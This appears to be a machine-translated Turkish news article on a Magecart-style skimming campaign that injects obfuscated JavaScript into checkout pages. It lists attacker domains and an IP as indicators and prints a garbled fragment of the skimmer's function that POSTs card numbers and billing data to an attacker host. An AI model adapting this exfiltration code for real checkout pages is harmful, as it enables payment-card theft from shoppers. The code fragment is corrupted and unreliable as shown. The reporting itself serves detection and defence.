E-ticaret web siteleri için tehdit manzarası, gizli JavaScript’in hassas ödeme bilgilerini hasat etmek için konuşlandırılması ile karakterize edilen sofistike bir Magecart tarzı saldırı kampanyasının ortaya çıkmasıyla bir kez daha değişti.
Kampanya ilk olarak Eylül 2025’in ortalarında, daha sonra siber güvenlik araştırmacısı Himanshu Anand tarafından ayrıntılı olarak araştırılan devam eden bir sıyırma operasyonunu gösteren bir tweet’in ardından ortaya çıktı.
Bu yeni bölüm, ölçülü olmayan finansal işlemleri hedeflemek için müşteri tarafı enjeksiyonundan yararlanan web sıyırma gruplarının kalıcı yaratıcılığını gösteriyor.
Söz konusu saldırı vektörleri, saldırgan kontrollü alanlarda barındırılan kötü amaçlı JavaScript enjeksiyonunu içerir cc-analytics[.]comgüvenliği ihlal edilmiş e-ticaret platformlarının savunmasız ödeme sayfalarına.
Eklendikten sonra, komut dosyası, ödeme verilerini sessizce dışarı atmak için form alanlarına ve etkinlik dinleyicilerine bağlanarak meşru ödeme iş akışlarına sorunsuz bir şekilde karışır.
Gözlenen ilk kod, hem güvenlik tarayıcıları tarafından tespit etmek hem de olay müdahale ekipleri tarafından analizleri hayal kırıklığına uğratmak için tasarlanmış, yoğun bir şekilde gizlendi.
Kod çeşitli kampanyalarda yeniden kullanılmış olsa da, kötü amaçlı yazılım mantığı, farklı alan adları altında çoğaltılmıştır. getnjs[.]com– getvjs[.]comVe utilanalytics[.]comöncelikle IP adresi 45.61.136.141 gibi altyapı üzerinde barındırıldı.
.webp){kind=spacer}
Siber güvenlik araştırmacısı Himanshu Anand, kötü amaçlı yazılımların operasyonel erişimini genişletmek için pasif DNS ve altyapı parmak izinden yararlanma yeteneğini kaydetti.
Anand, UrlScan ve Whois Records gibi kaynaklardan genel telemetriyi analiz ederek, tek bir saldırgan altyapısına bağlı ilgili alanların bir takımyıldızını haritalayabildi.
Bu pivotlar, bazıları meşru analiz veya yardımcı program hizmeti olarak maskelenen bir düzineden fazla aktif alan ortaya çıkardı, her biri aynı veya yakın bir skimmer yükleri sunuyor.
Kötü amaçlı yazılım enfeksiyon mekanizması
Bu Magecart operasyonunun başarısının merkezinde enfeksiyon mekanizması: [script src = "https://cybersecuritynews.com/new-magecart-skimmer-attack/https[:]//www[.]cc-analytics[.]com/app[.]js"].
Etkin olduktan sonra kod, kredi kartı numaraları ve faturalandırma adresleri gibi ödeme giriş alanlarında etkinlik kancaları oluşturur. Tetiklendiğinde, komut dosyası çalınan kimlik bilgilerini toplar ve hemen bir uzak sunucuya gönderir (pstatics[.]com) XMLHTTPRequest ve FormData nesneleri kullanma.
Çekirdek veri pessfiltrasyon mantığı aşağıdaki gibi açıklanabilir:-
function sendStolenData ("data```
const xhr"```"new XMLHttp"```uest ();
xhr```en ('POST', '```ps[:]//www.pstatics.com/i```
const form```a = "new Form"```a ();
form```a[.]append ('uid', "data```rdNumber");
rmData[.]appendid', data[.]billingo);
xhr[.]send"rmData"); }Tasarım, yalnızca geçerli, test dışı kimlik bilgilerinin-belirli uzunluk kriterlerini karşılayan-aktarılmasını ve çalınan verilerin kalitesini ve değerini en üst düzeye çıkarmasını sağlar.
Bu enfeksiyon yolu, sürekli altyapı ile daha da güçlendirilir ve saldırganlar zaman içinde etki alanı kalıplarını geri dönüştürür.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free